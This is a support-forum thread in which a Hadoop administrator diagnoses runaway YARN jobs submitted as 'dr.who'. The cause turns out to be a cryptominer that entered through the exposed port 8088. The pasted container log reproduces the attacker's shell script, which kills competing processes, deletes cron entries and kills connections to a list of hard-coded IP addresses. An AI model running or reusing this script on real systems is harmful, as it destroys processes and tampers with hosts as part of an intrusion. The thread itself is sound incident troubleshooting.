Support Questions

Find answers, ask questions, and share your expertise

Help please: Continuous YARN jobs failing with Exception message: bash: no job control in this shell

avatar
Contributor

Hi everyone,

 

I'm fairly familiar with Cloudera Hadoop, but this one is stumping me. I installed a fresh copy of CM 5.15.0 on newly provisioned hardware today:

 

Version: Cloudera Express 5.15.0
Java VM Name: Java HotSpot(TM) 64-Bit Server VM
Java VM Vendor: Oracle Corporation
Java Version: 1.7.0_67

 

It's running CDH5 version: 5.15.0-1.cdh5.15.0.p0.21

 

When I spun up the cluster, I noticed that the Cluster CPU was pegged at 100%.  Odd, since nothing should be running here yet.  A quick look at "top" on the datanodes showed yarn processes on each taking tons of CPU:

 

top - 20:57:28 up 3:20, 1 user, load average: 39.26, 39.38, 38.46
Tasks: 408 total, 1 running, 407 sleeping, 0 stopped, 0 zombie
Cpu(s): 28.6%us, 0.2%sy, 0.0%ni, 71.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 30794896k total, 4898532k used, 25896364k free, 123248k buffers
Swap: 0k total, 0k used, 0k free, 2963828k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
26355 yarn 20 0 391m 27m 584 S 549.0 0.1 303:19.37 java
26273 yarn 20 0 391m 27m 588 S 515.6 0.1 303:23.67 java
26313 yarn 20 0 391m 27m 584 S 512.9 0.1 303:33.08 java

 

These are 16 core servers, so a load average of 39.26 is crazy high.  I then checked the YARN -> Applications tab in CM, and there are ~40 jobs a minute being spawned and failing with this info:

 

ID: application_1534449578775_0528

Type: YARN

User: dr.who

Pool: root.users.dr_dot_who

Duration: 25.9s

Allocated Memory Seconds: 10.5K

Allocated VCore Seconds: 10

 

Every one of them has this error under "Application Details"

 

=================================================================

Application application_1534449578775_0528 failed 2 times due to AM Container for appattempt_1534449578775_0528_000002 exited with exitCode: 123
For more detailed output, check application tracking page:http://bddevh01.dbhotelcloud.com:8088/proxy/application_1534449578775_0528/Then, click on links to logs of each attempt.
Diagnostics: Exception from container-launch.
Container id: container_1534449578775_0528_02_000001
Exit code: 123
Exception message: bash: no job control in this shell
bash-4.1$ for i in {1..60}; do ps ax|grep ff.sh|awk '{print $1}'|xargs ps -o ppi
d=|xargs kill -9; done;pgrep -f "sh \./a[[:digit:]]{1,}$"|xargs kill -9;ps ax|gr
ep "./no1\|sssshd\|terty\|asdfsd\|qwefdas\|piois"|grep -v grep | awk '{print $1}
' | xargs kill -9;ps ax|grep "./uiiu"|grep -v grep | awk '{print $1}' | xargs ki
ll -9;ps ax|grep "./noda\|./manager"|grep sh|grep -v grep | awk '{print $1}' | x
args kill -9;ps ax|grep "./noss"|grep -v grep | awk '{print $1}' | xargs kill -9
;crontab -l | sed '/tmp/d' | crontab -;crontab -l | sed '/jpg/d' | crontab -;cro
ntab -l | sed '/png/d' | crontab -;netstat -antp | grep '158.69.133.20\|192.99.1
42.249\|202.144.193.110\|192.99.142.225\|192.99.142.246\|46.4.200.177\|192.99.14
2.250\|46.4.200.179\|192.99.142.251\|46.4.200.178\|159.65.202.177\|185.92.223.19
0\|222.187.232.9' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" |
xargs kill -9
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...

<snip>

kill -l [ signal ]
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
bash-4.1$ exit
at org.apache.hadoop.util.Shell.runCommand(Shell.java:604)
at org.apache.hadoop.util.Shell.run(Shell.java:507)
at org.apache.hadoop.util.Shell$ShellCommandExecutor.execute(Shell.java:789)
at org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor.launchContainer(DefaultContainerExecutor.java:213)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:302)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:82)
at java.util.concurrent.FutureTask.run(FutureTask.java:262)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:745)
Container exited with a non-zero exit code 123
Failing this attempt. Failing the application.

=================================================================

 

Does anyone know what this job is, or why it is getting this exception:

 

Exception message: bash: no job control in this shell

 

I've googled that error, but the results haven't led me in a direction that I can determine the root cause here.

 

Thank you SO MUCH for your time and suggestions...

Chris

 

1 ACCEPTED SOLUTION

avatar
Contributor

Yup.  Looks like this is the culprit:

 

https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

 

I found an entry in the security group that needed updating.  I'm thinking this will fix the problem.  Will post back one more time with a confirmation.

 

View solution in original post

4 REPLIES 4

avatar
Contributor

Sorry, I should have also mentioned that I did verify that port 2049 is not blocked at the firewall with the unix "nc" command.

 

Also, interesting enough, even after stopping the YARN service in CM, the jobs kept spawing.  I inspected the process that's running, and it's an odd one (to me):  

 

yarn 28333 1 99 19:59 ? 09:47:22 /var/tmp/java -c /var/tmp/w.conf

 

I don't know why there is a "java" in var/tmp, and there was no "w.conf" file there either.  

 

The mystery continues...

avatar
Contributor

More info:

 

I found this:  https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-a...

 

which is exactly what is happening to me.  Apparently my Security Groups in AWS need to be tightened somehow?  I'm not sure how this is happening...yet.

 

 

avatar
Contributor

Yup.  Looks like this is the culprit:

 

https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

 

I found an entry in the security group that needed updating.  I'm thinking this will fix the problem.  Will post back one more time with a confirmation.

 

avatar
Contributor

Confirmed.  This was the issue.  Closing the firewall to port 8088 from outside traffic kept this from happening again, along with removing the rogue cron entry in the yarn user's crontab file, and killing those yarn processes.

 

Chris